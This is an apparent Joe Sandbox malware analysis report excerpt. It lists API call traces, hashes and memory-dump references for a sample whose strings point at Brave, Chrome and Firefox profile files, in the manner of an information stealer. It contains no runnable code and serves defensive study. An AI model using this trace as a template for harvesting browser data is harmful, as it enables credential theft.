                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                    • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                    • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                    • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                    APIs
                                    • wsprintfA.USER32 ref: 0041492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00414B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                    • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                    • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                    • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                    APIs
                                    • wsprintfA.USER32 ref: 007F3B33
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F3B4A
                                    • lstrcat.KERNEL32(?,?), ref: 007F3B9C
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 007F3BAE
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 007F3BC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F3ECE
                                    • FindClose.KERNEL32(000000FF), ref: 007F3EE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID:
                                    • API String ID: 1125553467-0
                                    • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                    • Instruction ID: a8624d023464c76b23f09dfd6ce90f5588fde92e1678269d0c982bc804195229
                                    • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                    • Instruction Fuzzy Hash: 2CA14FB5A4021CABDB24DBA4CC89FFE7379BF49300F444588A60D96241DB799B84CF62
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                    • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                    • wsprintfA.USER32 ref: 004145A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                    • FindClose.KERNEL32(000000FF), ref: 004146A0
                                    • lstrcatA.KERNEL32(?,00A130A0,?,00000104), ref: 004146C5
                                    • lstrcatA.KERNEL32(?,00A19F60), ref: 004146D8
                                    • lstrlenA.KERNEL32(?), ref: 004146E5
                                    • lstrlenA.KERNEL32(?), ref: 004146F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 13328894-2848263008
                                    • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                    • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                    • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                    • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                    APIs
                                    • wsprintfA.USER32 ref: 007F4B93
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                    • FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                    • Instruction ID: a16fabcee7ab805739f3b6ffe4227971254c0fdf72b0e88b112109d63b6ce74f
                                    • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                    • Instruction Fuzzy Hash: 916165B5940218BBCB24EBE0DD49FFA73BDFB59700F404588B60992141EB75AB85CF91
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 007EC15C
                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 007EC1B4
                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 007EC1CA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007ECA26
                                    • FindClose.KERNEL32(000000FF), ref: 007ECA38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                    • Instruction ID: 1c96dbb6cb7048d00ea0c420810c48827c6ce026d9c770b1f88eb724619d55b7
                                    • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                    • Instruction Fuzzy Hash: 8C4234B6A10148EBCB14FBB0DD5ADFD7379AF58300F408568B60E56291EE389B49CF52
                                    APIs
                                    • wsprintfA.USER32 ref: 00413EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                    • FindClose.KERNEL32(000000FF), ref: 00414081
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                    • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                    • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                    • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47E7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F47EE
                                    • wsprintfA.USER32 ref: 007F480D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4824
                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 007F4852
                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 007F4868
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F48F2
                                    • FindClose.KERNEL32(000000FF), ref: 007F4907
                                    • lstrcat.KERNEL32(?,0064A524), ref: 007F492C
                                    • lstrcat.KERNEL32(?,0064A22C), ref: 007F493F
                                    • lstrlen.KERNEL32(?), ref: 007F494C
                                    • lstrlen.KERNEL32(?), ref: 007F495D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID:
                                    • API String ID: 671575355-0
                                    • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                    • Instruction ID: f00b95b2ba0a9bb600521399604c040d36e9757a76d5e42e915ed9f2aed3cc1e
                                    • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                    • Instruction Fuzzy Hash: 975156B955021CABCB24EBB0DD89FFE737DAB58700F404588F64992190DB789B85CF92
                                    APIs
                                    • wsprintfA.USER32 ref: 007F412A
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007F4141
                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 007F416F
                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 007F4185
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007F42D3
                                    • FindClose.KERNEL32(000000FF), ref: 007F42E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                    • Instruction ID: 355a650502e5a0d9046718c6ae11a1cc32f00518074f6c7d3c0b6768ce0be33f
                                    • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                    • Instruction Fuzzy Hash: 305161B690021CFBCB24EBF0DC89EFA737DBB58300F404598B65992140DB79AB858F95
                                    APIs
                                    • wsprintfA.USER32 ref: 0040ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                    • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                    • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                    • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: 4@$\*.*
                                    • API String ID: 2325840235-1993203227
                                    • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                    • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                    • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                    • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                    • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                    • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                    • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                    • FindClose.KERNEL32(000000FF), ref: 00401E32
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                    • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                    • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                    • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                    APIs
                                    • wsprintfA.USER32 ref: 007EEFA5
                                    • FindFirstFileA.KERNEL32(?,?), ref: 007EEFBC
                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 007EF012
                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 007EF028
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EF515
                                    • FindClose.KERNEL32(000000FF), ref: 007EF52A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID:
                                    • API String ID: 180737720-0
                                    • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                    • Instruction ID: e94e750149732e8ee8c2ae1541258ab1416e73da4b94963e81ca7f903850462c
                                    • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                    • Instruction Fuzzy Hash: 96E1D2B191121CEADB58EB60DD56EFE7339AF54300F4081E9B60E62252EE385F89CF51
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 007EDD52
                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 007EDD9A
                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 007EDDB0
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE033
                                    • FindClose.KERNEL32(000000FF), ref: 007EE045
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                    • Instruction ID: 02ec1579407768ad1fe9ef5981b156bcceeaff8476327112e711728694d137f5
                                    • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                    • Instruction Fuzzy Hash: 5F9136B2900248EBCB14FBB0DD5ADFD7379AF99300F40856DB54A56241EE389B5CCB92
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                    • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                    • Opcode Fuzzy Hash: 3e4cb658669e0da854d1c83ae07f47800a235198039fbdbe3b22788fe6e17176
                                    • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                    APIs
